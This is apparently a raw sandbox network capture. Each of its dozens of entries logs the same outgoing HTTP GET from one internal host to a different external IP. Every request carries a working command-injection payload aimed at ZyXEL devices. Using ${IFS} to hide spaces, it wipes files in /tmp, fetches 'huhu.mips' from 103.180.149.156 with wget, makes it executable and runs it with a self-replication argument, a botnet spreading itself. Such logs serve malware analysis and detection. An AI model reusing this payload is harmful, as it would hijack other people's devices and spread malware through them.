                                            Feb 2, 2024 06:21:00.387871981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1110192.168.2.154203286.250.105.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.387963057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1111192.168.2.1559464195.195.80.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388094902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1112192.168.2.1554494196.170.157.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388118982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1113192.168.2.1545726129.127.134.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388142109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1114192.168.2.1553168208.161.8.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388194084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1115192.168.2.1560914105.47.206.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388237953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1116192.168.2.153321847.194.216.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388273954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1117192.168.2.154989699.86.159.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388343096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1118192.168.2.154409870.40.132.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388364077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1119192.168.2.153888620.109.36.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388397932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1120192.168.2.1540430120.182.194.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388430119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1121192.168.2.1550178114.168.157.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388487101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1122192.168.2.154080889.39.8.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388530970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1123192.168.2.155152863.114.152.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388566017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1124192.168.2.1560468223.141.252.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388616085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1125192.168.2.1555218151.152.81.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388657093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1126192.168.2.1550894190.42.210.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388705015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1127192.168.2.154037831.23.7.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388741970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1128192.168.2.1557522198.64.141.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388797998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1129192.168.2.153847239.112.14.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388834000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1130192.168.2.1543844199.188.95.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388853073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1131192.168.2.1539162107.43.22.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388926983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1132192.168.2.153547435.157.172.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.388973951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1133192.168.2.155857282.1.14.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389003038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1134192.168.2.1535446211.19.166.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389061928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1135192.168.2.153771674.161.147.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389070988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1136192.168.2.153581288.164.189.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389121056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1137192.168.2.1544640175.119.52.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389147043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1138192.168.2.155988672.128.50.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389183044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1139192.168.2.1545838108.25.166.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389218092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1140192.168.2.1560810208.23.110.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389251947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1141192.168.2.1552780185.197.9.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389297009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1142192.168.2.1546458140.125.36.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389334917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1143192.168.2.154110840.51.11.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389378071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1144192.168.2.1559364135.212.104.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389416933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1145192.168.2.1533242182.181.160.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389453888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1146192.168.2.1537928204.66.252.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389498949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1147192.168.2.155784450.165.72.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389519930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1148192.168.2.1538606132.198.103.111443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389568090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1149192.168.2.1548146203.81.165.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389584064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1150192.168.2.153579632.216.248.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389655113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1151192.168.2.1560390149.142.29.79443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389688969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1152192.168.2.15516081.198.169.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389739990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1153192.168.2.1541094106.238.177.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389777899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1154192.168.2.1540830114.19.31.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389832973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1155192.168.2.155213258.159.89.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389879942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1156192.168.2.1541122169.144.213.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389904022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1157192.168.2.155383680.116.11.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389946938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1158192.168.2.1550908217.204.126.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.389985085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1159192.168.2.1560648168.114.136.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390038967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1160192.168.2.1537140139.197.90.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390089035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1161192.168.2.1542612160.14.71.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390125990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1162192.168.2.1549726167.242.161.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390157938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1163192.168.2.1542502164.50.183.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390219927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1164192.168.2.1537518124.190.9.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390258074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1165192.168.2.1556346172.70.199.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390295982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1166192.168.2.1533452174.183.5.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390316010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1167192.168.2.1537212156.197.139.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390348911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1168192.168.2.1539826138.68.58.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390389919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1169192.168.2.155808870.97.118.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390425920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1170192.168.2.155753865.241.21.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390465975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1171192.168.2.155310019.138.146.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390484095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1172192.168.2.1536402157.210.182.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:00.390521049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1173192.168.2.1537164165.41.14.82443
                                            TimestampBytes transferredDirectionData
